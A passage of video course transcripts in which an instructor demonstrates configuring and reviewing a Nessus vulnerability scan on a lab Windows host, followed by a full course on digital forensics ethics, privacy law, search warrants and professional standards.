selected. The page in the main pane labelled "My Scans" displays a list of scans in a table with the following
column headers: Name, Schedule, and Last Modified. [Video description ends]
Now this is what our Nessus screen looks like, you can see the different scans. The My Scans is a folder and
you have the capabilities here to create different folders. So you know if you were maybe doing scans for
different networks on a larger enterprise maybe have different folders for different scans, or maybe organize
the scans by time period, right? So you can create additional folders, and you can see down below here I have
performed a number of scans or a couple of different scans. And if I want to create a new scan or start a new
scan, I hit the New Scan button.
[Video description begins] A page titled "Scan Templates" displays in the main pane. It contains a "Scanner"
tab which has templates listed in the form of tiles such as "Advanced Scan", "Audit Cloud Infrastructure", and
" Badlock Detection". [Video description ends]
Now, with Nessus, when you go to perform a scan, it does have these templates built-in for the different types
of scans that are going to be performed. So for instance, maybe you only use Nessus just to discover systems
on the network and what ports are open on those systems. So they do have a host discovery type of scan, right?
Typically I don't use Nessus for that I'll use something like Nmap to discover my systems, right? And after I've
discovered the systems then I'll go and use Nessus to discover the vulnerabilities on those systems. But the
point being is is that there are templates for different types of scans. So what I'm going to do over here is I'm
going to do what we call an advanced scan.
[Video description begins] A page labelled "New Scan/ Advanced Scan" displays. It contains the following
four tabs: Settings, Credentials, Compliance, and Plugins. Currently, the "Settings" tab is selected. On the left,
is a navigation pane with expandable options such as BASIC and DISCOVERY. The "General" section is
further selected in the BASIC section. Various configuration details display on the right of the navigation
pane. These include fields such as "Name", "Description", and "Folder". [Video description ends]
And when I hit the advanced scan, you give the scan a name. So I'm going to call this, Windows 7 Scan 2. You
can fill in the description if you want to and then you specify the folder that you want to store the skin in to.
Right so there's the my scans I'm going to keep it at that but again, you could organize your scans into different
folders. Then the important part here is you get a specified the targets now in this case, I've got a specific
system as a target in mind, so I'm going to plug in the IP address of that system. So it's 192.168.67.130, and
keep in mind you can specify multiple targets. I can hit Enter here, and then I can just list out all the IPs of all
the different systems that I wanted to go and scan. Then up here on the credentials tab, you can specify the
credentials for
[Video description begins] The "Credentials" tab lists the following services underneath the "CATEGORIES"
set to "Host": SNMPv3, SSH, and Windows. [Video description ends]
the different services. So for instance, you know the target is a Windows machine so if I wanted to specify the
credentials of an administrative account and connect to that server using or that system using those credentials,
I can do that. Now I'm purposely not going to supply credentials and the reason why is, I want to perform the
scan as a hacker would see the system, so the hacker doesn't have any credentials. What the hacker see, right is
kind of what I'm thinking here. And it does mean a lot of times you want to perform your vulnerability scans
multiple times. Once as kind of a guest or an anonymous type of account, and another time as an
administrative account. So that you can kind of discover what somebody with administrative privileges would
be able to see as well.
So I'm again on purpose here, I'm not going to apply any type of user accounts. Now if I wanted to supply user
accounts, sorry, let me go back to the credentials tab here. I can hit the little add credential button, and what
it'll do is it'll open up a form here where I type in the username and the password and domain name, but again,
I'm not going to do that, so I'm going to close that. And I'm going to go over to our compliance tab here, I don't
have anything that I'm going to set on the compliance tab. So basically Nessus can go and perform
vulnerability scans to adhere to different types of regulations to be compliant, so you can choose some of those
options. What I want to do here is I want to choose my plugins, the plugins are the different types of
vulnerabilities to look for,
[Video description begins] In the "Plugins" tab, there is a table that lists various plugins underneath the
following column headers: STATUS, PLUGIN FAMILY, and TOTAL. The "STATUS" column currently shows
all the listed plugins in the "ENABLED" mode. [Video description ends]
for the different platforms. Now by default, all of the different plugins are enabled, which means that the scan
is going to take quite a bit of time. Because it's going to perform all of these different or it's going to execute
all these plugins looking for all kinds of different vulnerabilities. Now, I specifically know that I'm targeting a
Windows box.
So for this demonstration just to cut down on the time, what I'm going to do is I'm going to you can disable
these individually by just toggling them off if you wanted to. But what I'm gong to do is I'm going to say
disable all plugins and I'll go through and I'll just pick a few. So let's say I want to look for back doors, I want
to do brute force attacks, but there's no sense in me choosing any of the Linux plugin when I know the target
are Windows machines in this case. Maybe I'll do a denial service and I'll do DNS, now a lot of times when I'm
performing a scan, I would leave all the plugins selected. Again, unless you knew specifically that target
doesn't support that OS. But a lot of times you are scanning multiple targets at one time. So you'd leave them
all enabled and knowing that it will take quite a bit of time you're adding to time as far as the duration of the
scan goes. So I'm just going to choose a few here and I'm going to scroll down and hit my Windows ones. I'm
not going to bother with the maybe I will do SMTP and SNMP, but I want to get down to the Windows one.
So I do want to enable the web server plugin, the Windows plugin, the Windows Microsoft Bulletin and the
Windows User Management. So I've chosen, I'll say, 5, 6, 7, 8, 9, 10, 11, 11 different plugins, and then I'll hit
the Save button.
[Video description begins] The "My Scans" page displays. It lists the "Windows 7 Scan 2" plugin. The "Last
Modified" column shows "N/A" as its corresponding value. [Video description ends]
And it's gone and created our scan here. So Windows 7 Scan 2, you can see that it hasn't executed yet, so now I
want to execute it. Now when I do execute this, so I hit the little run button, the little play button there, and you
can see here it is executing. And that'll take a few minutes as it goes and executes those plugins to determine
vulnerabilities against the target based off those plugins that were selected. So I'm going to pause the video
here it'll probably take about three minutes based off the few plugins that have gone in enabled. So I'm going
to pause the video and then I'll resume it when it's all done. Okay, the scan is complete, it probably only took
about two minutes. I was only scanning one system and I selectively chose which plugins I wanted to execute,
so it was pretty quick. In real world, it'll take quite a bit of time, depending on the number of targets and the
number of plugins. Now to take a look at the results, what you do is you choose the scan. So here's my
Windows 7 Scan 2, so I click on it and it opens up a chart here.
[Video description begins] A page labeled "Windows 7 Scan 2" displays. It contains three tabs: Hosts, which
is currently selected, Vulnerabilities, and History. The values of which are 1, 11, and 1 respectively. A list
displays with "Host" and "Vulnerabilities" as headers. Sections titled "Scan Details" and "Vulnerabilities" are
present on the right hand-side. [Video description ends]
So you can kind of see, now, had I have gone and scanned multiple targets, I'd have a whole list here of each of
the targets. And you'd see you know listed, you know like a little line graph that shows you, you know the
critical vulnerabilities, the high vulnerabilities, medium, low and information type messages. So normally you
will see kind of multiple colors here because there will be different levels of vulnerabilities that exist on a
system. So what you can do is you can kind of select the host if you wanted to or you can go right to the
vulnerabilities tab if you wanted. Now before I choose this host, I want you to notice over on the right we've
got our scan details. So I can see the name of the scan, I can see that it completed, it was an advanced scan, we
can see the start time and end time.
So you can see there, it only took two minutes to do, because it was just one system. And then we got a quick
little overview of the levels of vulnerabilities, right? Critical vulnerabilities versus, let's say, low
vulnerabilities, which show as a green piece of pie. And then you can hover over and you can see here that the
information data is 91% of the results whereas critical vulnerabilities is just 9% of the results. And again, you
would have different colors here for the different levels of vulnerabilities. So what I'm going to do is I'm going
to choose this system because I'm kind of curious to see, okay, what is this critical vulnerability?
[Video description begins] A new page titled "Windows 7 Scan 2 / 192.168.67.130" with a "Vulnerabilities"
tab displays. It contains a table with the following column headers: Sev, Name, Family, and Count. On the
right are two sections: Host Details and Vulnerablities. [Video description ends]
And in this case, you can see the list of vulnerabilities, and you can see the information, but that critical one is
listed at the top. So they'll have the, most important information towards the top. So what I can do is I can
scroll down here and kind of look at the results overall with this system. Or, I can click on the actual critical
vulnerability in this case, and I can read up on what this vulnerability is, right?
[Video description begins] A page titled "Windows 7 Scan 2 / Plugin#53514" displays. It lists details under
headings such as "Description" and "Plugin Details". [Video description ends]
So it says vulnerability and DNS name resolution could allow remote code execution, right? So and then it
gives you a little description, all right? So a flow in the Windows DNS client process link, and so on. So you
read the description, you read the solution, so they do have a set of patches. So basically, the system needs to
be patched or updated, the other thing that I do like is over here on the right. Is that you kind of see some
information about the plug-in, so I can see that this is a remote vulnerability. So it does mean that a hacker
doesn't have to be on the system to execute the vulnerability. You'll see the risk information, so it's a critical
risk. And then down below, this is what I always watch for, is the vulnerability Exploit Available true.
So that means there are Exploit Available that somebody could leverage to take advantage of this vulnerability
and potentially gain access to your systems. And so that's very important, I always look for that, especially
when performing a pen test. I want to prove the concept, I want to see if I can exploit that vulnerability. So I
just look okay, is it exploitable? And then down bottom they have the Exploitable With, and I can see
Metasploit. As some metasploit does have the capabilities to exploit this vulnerability. So now you know what
tools to use as a pen tester to exploit that vulnerability. So in this demonstration you've seen how to use Nessus
as a vulnerability scanner.
Objectives
[Video description begins] Topic title: Course Summary [Video description ends]
So, in this course, we've examined key concepts related to various types of security auditing, and audit
strategies, and auditing tools. We did this by exploring the key concepts of cyber security auditing, as well as
the assessment and reporting processes.
How to use the Wireshark network security auditing tool and the nmap perimeter security tool. How to
perform auditing for web applications, as well as Windows and Linux security monitoring. Strategies for cyber
security audits and comparing the pros and cons of various audit tools. And finally, how to use the Nessus
audit tool and run a Nessus security system scan.
Ethics & Privacy: Digital Forensics
This 12-video course examines the concept of ethics as it relates to digital forensics, including reasonable
expectation of privacy, legal authorization, and the primary function of attorney-client privilege and
confidentiality. The legalities surrounding digital forensics investigative techniques and standards for
analyzing digital evidence are also covered. Begin with a look at the definition of what is considered a
reasonable expectation of privacy. You will then learn to differentiate between legal authorization forms such
as consent forms and warrants. Next, explore the primary function of attorney-client privilege and
confidentiality, and recognize the legalities surrounding digital forensics investigative techniques. Delve into
the need for ethics in digital forensics, and the best practices for ethics and forensics. Discover steps for
regulating ethical behavior; recognize possible conflicts of interest and how to avoid them; and examine the
importance of ongoing training for both investigators and management on the importance of ethics. The final
tutorial in this course looks at different standards for analyzing digital evidence.
Table of Contents
Objectives
Hi, I'm Glen Clarke. I've been a certified trainer for over 20 years, teaching organizations how to manage their
network environments and program applications with Microsoft technologies. I'm also an award-nominated
author who's authored the CompTIA Security+certification study guide, the CompTIA Network+ certification
study guide, and the best selling CompTIA A+ certification all-in-one for dummies.
My focus over the last ten years has been teaching Microsoft certified courses, information security courses,
and networking courses such as Cisco ICND 1 and ICND 2. Aspiring security architects should have a solid
understanding of the role and implications of ethics and privacy considerations as they proceed through the
world of forensics.
In this course, I'll explore ethics as it relates to digital forensics, including privacy, legal authorization, ethical
decision making, potential conflicts, and standards. First, I'll describe what is considered reasonable
expectation of privacy, legal authorization forms such as warrants. The primary function of attorney-client
privilege and confidentiality, and the legality surrounding digital forensics investigative techniques.
Then I'll discuss the need for ethics in digital forensics, what the best practices for ethics and forensics are, and
discuss the steps to regulate ethical behavior. Moving on, I'll explore conflicts of interest, describe the
importance of ongoing training, and finally, I'll examine the different standards for analyzing digital evidence.
During this video, you will learn how to define what is considered a reasonable expectation of privacy.
Objectives
[Video description begins] Topic title: Expectation of Privacy. Your host for this session is Glen E.
Clarke. [Video description ends]
In this video, you will learn about expectation of privacy as it relates to computer forensics.
[Video description begins] Screen title: Expectation of Privacy. [Video description ends]
Expectation of privacy in the computer forensics world is an important topic. Expectation of privacy is the fact
that your personal computer or personal laptop should be considered a private container. And law enforcement
can not look through its files without obtaining a search warrant.
The problem is, there are different interpretations of what expectation of privacy applies to. Does it apply to
personal devices such as phones and laptops? Does it apply to public computers, such as computers found in
Internet cafes and public libraries? And does it apply to your work computers and your laptops? If law
enforcement suspects that I have committed a crime, they can not just take my laptop and search it for
evidence. Because that laptop is my private property and should be considered a private container.
Before law enforcement can search through my computer. They must ensure they have the appropriate
authorization by obtaining a search warrant. Authorization is needed due to the Fourth Amendment protection
and the fact that people have an expectation of privacy. As a general rule, you can consider any of your
personal properties such as a laptop or phone. As being an object that law enforcement needs authorization
before sifting through the contents.
But what about public computers such as library computers and computers found at Internet cafes? This is
definitely a gray area, but has been ruled that if you knowingly expose information to others. Then that
information is not protected by Fourth Amendment. Let's look at a different scenario.
[Video description begins] Screen title: Private Searches. [Video description ends]
What if you had taken your computer laptop to a local computer shop to have repairs done? If the technician
stumbles across incriminating evidence while doing the repairs. That information is admissible in court, even
though no search warrant was obtained. Because you had given your device to that person. For example, if the
technician stumbled across child pornography, they would report it to police.
Police would use that information to obtain a search warrant to search the computer for more evidence. The
initial evidence would be admissible due to the fact that law enforcement did not ask the technician to look for
it. But any evidence after the police are contacted would need a search warrant as authorization. The next
concern is, what about work computers?
[Video description begins] Screen title: Work-issue Computers. [Video description ends]
Do employees have an expectation of privacy as it relates to their work computers? The Supreme Court
believes that employees should have an expectation of privacy as it relates to personal use of the company
computer. So, it's the job of the employer to lower that expectation of privacy. Companies do this by giving
notification to users that all their activity is monitored, including email and Internet usage. For example, many
companies use a log on banner stating all activity is monitored. And the employee must agree to the terms
anytime they log on to a company system. The Supreme Court has ruled that a search warrant is needed by law
enforcement when a co-owned computer or shared computer is involved.
[Video description begins] Screen title: Shared Devices. [Video description ends]
The backstory on this is that there was a case where a wife found child pornography on the family computer.
And gave permission to police to seize the computer. The evidence was thrown out at trial due to the fact that
law enforcement didn't have a search warrant before seizing the computer. There was an appeal and the court
appeal allowed the evidence and forced a retrial.
Then the Supreme Court took the side of the initial hearing and ordered the evidence inadmissible and the
husband was acquitted. A key point to take from this is that computer forensics and expectation of privacy is
not a clear cut topic. There is much debate over what expectation of privacy is. In today’s day and age, mobile
devices such as cell phones and tablets are heavily used by individuals.
[Video description begins] Screen title: Mobile Devices. [Video description ends]
And are suspect to evidence collection when a legal incident arises. Because cell phones and tablets contain a
wealth of different types of sensitive information. Law enforcement has to be very disciplined in how they deal
with such devices. Examples of sensitive information would be photos, videos and communication messages
with other parties. Such as text messages and email messages. Many courts and privacy acts find that users of
cell phones containing private and personal information have a reasonable expectation of privacy.
Because mobile devices contain private information about a person's life. Because the Courts and Privacy Act,
such as the Canadian Charter of Rights. Specifies that everyone has the right to be secure against unreasonable
search and seizure. Law enforcement will have to ensure that they are careful to make reasonable search and
seizure with mobile devices. As it has been determined over and over again that mobile device users have
expectation of privacy.
[Video description begins] Screen title: Search Incidental to Arrest. [Video description ends]
There are times when the level of expectation of privacy is automatically lowered. For example, the Supreme
Court of Canada has determined there is a lowered expectation of privacy during a lawful arrest. Or if law
enforcement have lawful reason to perform a search.
Some examples of lawful reasons to perform a search are, in order to protect the police officer, the suspect, or
the general public. In order to preserve any evidence. And the final reason is any discovery of evidence. In
order to locate additional suspects, the searching for evidence on the cellphone may be needed. In this video,
you've learned about expectation of privacy.
Learn how to differentiate between legal authorization forms, such as consent forms and warrants.
Objectives
differentiate between legal authorization forms such as consent forms and warrants
[Video description begins] Topic title: Legal Authorization. Your host for this session is Glen E.
Clarke. [Video description ends]
[Video description begins] Screen title: Fourth Amendment. [Video description ends]
The Fourth Amendment of the United States Constitution was designed to protect the privacy of individuals by
restricting law enforcement from performing unreasonable search and seizures. In order for evidence to be
admissible in court, it had to be obtained in a lawful manner. Due to the Fourth Amendment, collecting
evidence in a lawful manner means a search warrant is needed prior to the search and seizure.
The Fourth Amendment ensures that people have the right to be protected against unreasonable searches on
their persons, their houses, their papers, and their personal effects. It should be noted that the Fourth
Amendment protects individuals' rights from unreasonable searches by an agent of the government, such as
law enforcement. It does not protect from private searches, say, a company monitoring an employee's email or
Internet usage. There are some exceptions where searches without a warrant are allowed,
[Video description begins] Screen title: Common Authority. [Video description ends]
and one of those exceptions is known as common authority. The common authority rule allows for a person to
give law enforcement the permission to perform a search on another person's property. The common authority
rule is allowed in scenarios where both parties have control over the same property. A legal term we hear of at
times is the term apparent authority.
[Video description begins] Screen title: Apparent Authority. [Video description ends]
Apparent authority is a term to describe when a principle, such as a company, indicates to a third party that an
agent is authorized to act on its behalf. This means that a company is bound by the agent's actions unless the
company proves the agent falsify the impression of apparent authority. One of the biggest questions
surrounding legal search and seizures is what are the requirements to obtain a search warrant.
[Video description begins] Screen title: Search Warrant Requirements. [Video description ends]
The search warrant must be filed in good faith. Meaning that the search warrant must be filed by an officer of
the law for lawful reasons. The search warrant must be based on reliable information that also shows probable
cause for the search and seizure. The warrant must be issued by a neutral magistrate. And finally, the warrant
must also state the specific location to search, and what specific items are being seized. There are exceptions
where law enforcement officers do not need a search warrant.
[Video description begins] Screen title: Search Warrant Exceptions. [Video description ends]
The first exception is if a person freely and voluntarily, with expectation of privacy, gives consent to law
enforcement to search their property. The second exception is plain view. If an officer is searching a property
and a piece of evidence is seen in plain view, they may seize that evidence. The third exception is search
incident to arrest.
This means that if an officer is making an arrest, they have the right to search the person and surrounding areas
for weapons or other objects to keep the officer safe. If evidence is found during this process, a search warrant
is not needed. Exigent circumstances is another exception. This is when a police officer believes others may be
placed in danger, or the evidence could be destroyed in the time it takes to obtain the search of warrant.
The second last exception is automobile exception. If law enforcement has reason to believe there is
contraband in the vehicle, they may search the vehicle. The last exception is hot pursuit. If law enforcement are
in hot pursuit of fleeing criminal, they may enter the private property and search the entire area without
obtaining a search warrant. In this video, you learned about legal authorizations with topics such as Fourth
Amendment and search warrants.
[Video description begins] Topic title: Attorney-Client Privilege. Your host for this session is Glen E.
Clarke. [Video description ends]
[Video description begins] Screen title: Attorney Client Privilege. [Video description ends]
Attorney client privilege in a tenant of law that is designed to allow for open communication between a lawyer
and its client. This principle means that details that the client discloses to its lawyer are to be maintained in
confidence with the lawyer. Without such a tenant, it was determined that a client would withhold information
from their lawyer, and as a result not received the best legal advice possible. In order for communications to be
protected under attorney client privilege, there are criteria.
[Video description begins] Screen title: Protected Communication. [Video description ends]
First, the person must be seeking legal advice from a lawyer, and that lawyer will be acting as the person's
legal authority. Second, the communication must be made for the purpose of obtaining legal advice. Third, the
communication is made in confidence. Meaning, there can't be other people in the room when the client
communicates to their lawyer. And lastly, the communication must be made by the client. There are exceptions
to the attorney client privilege rule that you should be aware of.
In the following circumstances, information learned is not governed by attorney-client privilege. First, the
communication must be legal advice. For example, business advice is not governed by attorney client
privilege. The attorney client privilege also does not apply to communications that involve a crime being
committed or facilitate that crime being committed. Lawyers are not the only people that must hold
information related to a client confidential.
[Video description begins] Screen title: Expert Obligation. [Video description ends]
Other third party persons involved in the case must maintain confidentiality such as the computer forensics
investigator, who's filtering through the digital evidence. It is important to note that these experts are typically
not present when the client communicates with the lawyer. But expert obligations states that the information
the expert discovers must be maintained in confidence. In this video, you've learned about attorney client
privilege.
Upon completion of this video, you will be able to recognize the legalities surrounding digital forensics
investigative techniques.
Objectives
[Video description begins] Topic title: Investigative Techniques. Your host for this session is Glen E.
Clarke. [Video description ends]
In this video you will learn about investigative techniques used by forensics investigators.
[Video description begins] Screen title: Possession of Exhibits. [Video description ends]
It is important that the forensics investigator follows legal techniques to locate evidence so that the evidence is
admissible in court. Questions that need to be answered are, is the evidence co-owned? Can the exhibit be
analyzed without legal authorization? And does the exhibit belong to an employee? The key point with each of
these questions is that the device has to be obtained in a legal manner. The device owner must authorize law
enforcement to perform the search in order for the search and seizure to be lawful without a warrant. All
evidence must be obtained in a legal manner.
[Video description begins] Screen title: Electronic Communications. [Video description ends]
This means that using hacking techniques to obtain evidence is unlawful. And could end up with criminal
charges being laid against anyone using such techniques. This includes evidence obtained from key loggers,
spyware, or persisting cookies. Many states require that the forensics examiner that is being used be a licensed
forensic examiner.
In many states, if an unlicensed forensic examiner is used, it could result in imprisonment, damages and fines.
Not only for the forensics examiner, but also for the legal team that's using the forensics examiner. The
American Bar Association is against such legislations, as in many cases, the forensic work could be performed
in different states. For example, the imaging of the drives could be done in one state while the analysis of the
data could be performed in another state. Another legal consideration is the mining of data that an individual
would feel is an invasion of their privacy.
[Video description begins] Screen title: Aggregation and Inference. [Video description ends]
An example of this is the tracking of a person's location using their IP address. Put into question is the fact that
if an investigator outside the formal discovery process analyzes data, is it an invasion of privacy? Is it a case of
intrusion upon seclusion, which means intentionally intruding upon someone's private affairs? Or is it a case of
tort liability? A tort being a wrongful act or an infringement of a person's right. There have been cases where
invasion of privacy has been expressed due to the reconstruction of data by aggregation and inference. Which
is the collection of data and concluding based on that data. One final consideration is how the digital forensics
examiner interacts with the prosecutor.
[Video description begins] Screen title: Responsibilities of a Prosecutor. [Video description ends]
It is important to note that if a forensics examiner discovers evidence during a non-criminal investigation and
reports that to law enforcement. Law enforcement is then to request a search warrant based on probable cause
before searching for more evidence on the media. If the forensic examiner is asked to keep looking for
evidence, he's then acting as an agent of the law. And any evidence found would be inadmissible in court as no
search warrant exist. In this video, you learned about investigative techniques and considerations.
After completing this video, you will be able to describe the need for ethics in digital forensics.
Objectives
[Video description begins] Topic title: Ethics in Digital Forensics. Your host for this session is Glen E.
Clarke. [Video description ends]
In this video, you will learn about ethics in computer forensics. A digital forensics examiner has access to a lot
of different types of
[Video description begins] Screen title: Ethics in Digital Forensics. [Video description ends]
privileged information. The types of information they have access to is most times controversial, as it could be
trade secrets. It could be threats to national security, communications between different parties, and personal
information such as diaries, videos, and photos. The evidence that is found or not found on digital media is key
to the outcome of the case. One of the challenges with digital forensics is the ever changing technologies that
drive our everyday life.
[Video description begins] Screen title: Various Disciplines. [Video description ends]
Due to rapid changes in technology, there's a constant need for educated forensic specialist. Some areas that
have risen over the last few years that is evolving computer forensics is things like ethical hacking, forensics in
the cloud, and Internet of Things. One of the challenges faced with computer forensics professionals
[Video description begins] Screen title: Emerging Technology. [Video description ends]
is that the laws, whether it be civil law or criminal law, have not kept up-to-date with technology trends. For
example, the Electronics Communication Privacy Act makes no reference to the Internet. It is critical that
forensics examiners stay up-to-date with technologies and hold themselves to an ethical standard. There is a
code of ethics that digital forensics examiners must follow.
[Video description begins] Screen title: Code of Ethics. [Video description ends]
The code of ethics is designed as a minimum standard of acceptable conduct and is not a substitute for
lawfulness. The code of ethics is to apply to all activities performed by the forensics examiner. Including any
research performed by the examiner, the collection, preservation, and analysis of evidence. And finally, any
testimony given with inside the court of law. A key point to make is that the code of ethics is not an exhaustive
list of permitted behaviors or prohibited behaviors. The code of ethics does not list all the do's and don'ts with
computer forensics, because it could be interpreted that something not on the do's and don'ts list is allowed.
For this reason, the code of ethics is very vague. The code of ethics that govern forensics examiners is
designed to give guidance for professionals acting in good faith. Forensics examiners are expected to have
good moral character and have training and experience in a number of areas. Such as separation of duties,
intellectual property law, criminal law, as it's related to computer forensics. And characteristics such as
reasonable care, loyalty, independence, and confidentiality. The code of ethics is not a set of laws, but an
examiner not following
the code of ethics could result in harm to others. Which could result in the forensics examiner with sanctions
by the court, damage liabilities, and/or criminal liabilities. A forensics examiner not following the code of
ethics could ruin his or her reputation very quickly, which would result in no one calling upon their services
anymore. In this video, you learned about the importance of ethics with computer forensics.
Upon completion of this video, you will be able to describe best practices for ethics and forensics.
Objectives
describe best practices for ethics and forensics
[Video description begins] Topic title: Ethical Decision Making. Your host for this session is Glen E.
Clarke. [Video description ends]
In this video, you will learn about ethics governing a computer forensics professional.
Ethics is a Greek word for moral, or having morals, and it's a set of principles that govern a person's behavior.
Another way to think about this is that ethics is the discipline of dealing with what is good and what is bad. For
many, ethics is the professional norms shared by a group of individuals or a governing body. The nature of
work performed by a forensics examiner is seen by many as being tedious, offensive, improper, and unethical.
[Video description begins] Screen title: Nature of Work. [Video description ends]
One of the reasons people may view the work of a computer forensics professional as being offensive,
improper, or unethical is due to the expectation of privacy people have when it comes to digital media. A
computer forensics professional will need to have knowledge of laws and professional norms that affect their
profession,
[Video description begins] Screen title: Ethical Decision-making. [Video description ends]
but also follow these ethic principles. Honesty, they must be truthful. Being truthful is a big part of good
morale. Prudence, they must have wisdom in their field. And they should also be compliant with the law and
professional norms. With these three principles in hand, the computer forensics examiner can make ethical
decisions when faced with dilemmas on the job. In this video, we learned about computer forensics ethics.
After completing this video, you will be able to recognize the steps for regulating ethical behavior.
Objectives
[Video description begins] Topic title: Regulating Ethical Behavior. Your host for this session is Glen E.
Clarke. [Video description ends]
Due to the nature of computer forensics tools and procedures, it's critical that the ethical guidelines ensure that
forensic specialists are conducting themselves in an ethical manner. Digital forensics procedures are focused
on the recovery and analysis of digital content found on all kinds of different types of devices. It's important
that a forensic specialist be able to remove any bias they would have to a case, as they are to act as a specialist
providing expert testimony. The ethical guidelines for computer forensic specialists are needed to ensure that
examiners do not present data in an obscure manner.
[Video description begins] Screen title: Ethical Guidelines. [Video description ends]
Data should be presented in a clear, concise fashion. Also, they should not withhold crucial information that
could affect the outcome of the case. And finally, this should not predetermine the outcome of their
investigation. It is important that computer forensics professionals are ethical in their behavior.
Which involves performing a complete and thorough investigation and presenting the true facts of their
finding. Mandatory requirements of ethical forensics behavior is to be neutral in the investigation and the
delivery of true facts so that the court can accurately decide the outcome of the case. In this video, you learned
about regulating ethical behavior.
After completing this video, you will be able to recognize possible conflicts of interest and how to avoid them.
Objectives
[Video description begins] Topic title: Conflict of Interest. Your host for this session is Glen E. Clarke. [Video
description ends]
In this video, you will learn about conflict of interest, as it relates to computer forensics.
[Video description begins] Screen title: Conflict of Interest. [Video description ends]
A conflict of interest is when an individual has a personal interest to influence the outcome of his or her duties.
There are many examples of what interest plays in this definition. It could be a financial gain through some
form of compensation or it could be gain from some form of personal advantage that the person would obtain.
It is critical to the profession that a forensics examiner stay true to the ethics and avoid scenarios of conflict.
[Video description begins] Screen title: Avoiding Conflict. [Video description ends]
This means that forensics examiners should not have any emotional investment or monetary benefit that is
dependent on the outcome of a case. This includes fees being paid to the forensics examiner. The fees are paid
for the examiners expertise and time, not for the outcome. As a forensics specialist, remember that neutrality
and lack of interest in the case are the key to avoiding conflict. In this video, you've learned about conflict of
interest.
Upon completion of this video, you will be able to describe the importance of ongoing training for both
investigators and management on the importance of ethics.
Objectives
describe the importance of ongoing training for both investigators and management on the
importance of ethics
[Video description begins] Topic title: Qualifications and Training. Your host for this session is Glen E.
Clarke. [Video description ends]
Two important qualities for any forensic specialist is ethics and competence. Professional competence is
having the knowledge and skill to eliminate errors in your work so that you're not led to have errors in
judgment. In order to increase your competence as a forensic specialist, you should always be learning and
updating your skills in all aspects of computer forensics. This includes being current in advances in
technologies, but also with laws and regulations. As a computer forensic specialist, you must ensure to have
ethical behavior.
[Video description begins] Screen title: Ethical Behavior. [Video description ends]
Which can be accomplished with these three main strategies. First, ensure that you are accurately following all
forensics processes when it comes to search, seizure, and analyzing digital evidence. You must also accurately
present your credentials and be sure not to misrepresent or overstate your qualifications. And finally, as a
forensic specialist, you must always behave responsibly. Which includes keeping confidential information
private, as required by law and by your profession. As a forensic specialist, your job is not to pass judgement
on whether the suspect is guilty or not guilty.
[Video description begins] Screen title: Judgement. [Video description ends]
It's the job of the courts to determine that. The job role of the computer forensic specialist is to acquire the
evidence. This typically involves creating a forensically sound image of the data. Then you'll need to analyze
that evidence. This involves searching through the data that's inside the image to locate the appropriate
evidence. And then finally, you want to report on your findings. In this video, you've learned about
professional competence.
Upon completion of this video, you will be able to recognize the different standards for analyzing digital
evidence.
Objectives
[Video description begins] Topic title: Analysis Standards. Your host for this session is Glen E. Clarke. [Video
description ends]
In this video, you will learn about different standards for analyzing digital evidence.
[Video description begins] Screen title: National Institute of Standards and Technology (NIST). [Video
description ends]
The National Institute of Standards and Technologies, or NIST for short, is an organization that develops
standards and guidelines for a number of technologies and security requirements. As it relates to computer
forensics, the Information Technology Laboratory, or ITL, is a part of NIST that has three projects that aid in
organizations ensuring they're using valid, forensically sound software to perform their forensics
investigations.
The first project is the National Software Reference Library, which is a listing of files used by common
applications and a hash value representing the file. This library is used by forensics investigators to identify
valid files on the system that do not need further investigation. This allows the investigator to not waste time
and focus on other evidence files on the system. The second project is the Computer Forensics Tool Testing,
which is a methodology for testing forensic software.
The Computer Forensic Tool Testing is a specification for test procedures and test criteria used to verify the
validity of the forensic software. The third project is Computer Forensics Reference Data Sets, which is a set
of digital evidence that a forensics investigator can use to test and verify forensic software. The reference data
sets would contain well-documented evidence, such as search strings, that the examiner can use to verify that
the forensics tools they're using can locate the same information. Another standards organization is the
International Standards Organization, or ISO.
[Video description begins] Screen title: International Organization of Standardization (I S O). [Video
description ends]
ISO provides guidelines related to the identification, collection, acquisition, and preservation of digital
evidence. The purpose of these guidelines is to ensure that digital evidence is handled in a forensically sound
manner. These guidelines are acceptable practices all over the world. The Global Information Assurance
Certification, or GIAC, has developed a code of ethics that should be followed by all digital forensics
professionals.
[Video description begins] Screen title: Global Information Assurance Certification (G I A C). [Video
description ends]
The first code of ethics is respect for the public. This means that the computer forensics professional will act
responsibly, and ensure that his or her decisions do not negatively affect the public, their reputation, or the
reputation of the forensics profession. The second code of ethics is respect for the certification, which means
that the forensics professional will not distribute proprietary information about GIAC certifications and their
processes.
The third code of ethic is respect for my employer, which means that the examiner will deliver competent
services and maintain confidentiality with private data that they come in contact with. The fourth and final
code of ethic is respect for myself, which means the forensics professional will avoid any conflict of interest,
and not misuse any information learned or privileges gained by their profession. As a way to maintain high
ethical standards, the GIAC has an ethics council that is elected by the advisory board.
[Video description begins] Screen title: G I A C Ethics Council. [Video description ends]
The ethics council performs a number of activities related to ethical matters in regards to GIAC certifications.
They perform activities such as, they investigate any ethic incidents and enforce the code of ethics. They
provide advice to the GIAC director in regards to ethical issues. And finally, they assist members with ethical
questions or concerns they have in relation to GIAC certifications. GIAC prioritizes its code of ethics and has a
process in place to handle violations in GIAC ethics.
[Video description begins] Screen title: Ethics Violations. [Video description ends]
The first step in the process is complaint submission. Anyone can submit an online written complaint regarding
a violation of ethics through the GIAC site. The complaint is then reviewed in an investigation into the details
occur. The ethics council performs this investigation and creates a report with any recommended discipline for
the director to review.
If individual has been found in violation of the code of ethics, they may appeal within 30 days. The appeal is
handled by the GIAC appeals committee and communicates a recommendation to the director. The director
then communicates the outcome of the appeal to the interested parties. In this video, you've learned about
industry standards in relation to computer forensics.
[Video description begins] Topic title: Course Summary. Your host for this session is Glen E. Clarke. [Video
description ends]
In this course, we've examined ethics as it relates to digital forensics. Including areas such as privacy, legal
authorization, ethical decision making, potential conflicts, and standards. We did this by exploring topics such
as reasonable expectation of privacy and differences between legal authorization forms.
We also discussed the primary function of attorney client privilege and confidentiality. And the legality
surrounding digital forensics investigative techniques. We also explored the need for ethics in digital forensics.
The best practices for ethics in forensics. And steps to regulate ethical behavior. We also explored possible
conflicts of interest and how to avoid them.
We covered topics such as the importance of ongoing training for investigators and management on the
importance of ethics. And finally, we discussed the different standards for analyzing digital evidence.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. [Video description ends]
Hi, I'm Dan Lachance. [Video description begins] Your host for this session is Dan Lachance. He is an IT
trainer/consultant. [Video description ends]
I've worked in various IT roles since the early 1990s, including as a technical trainer, as a programmer, a
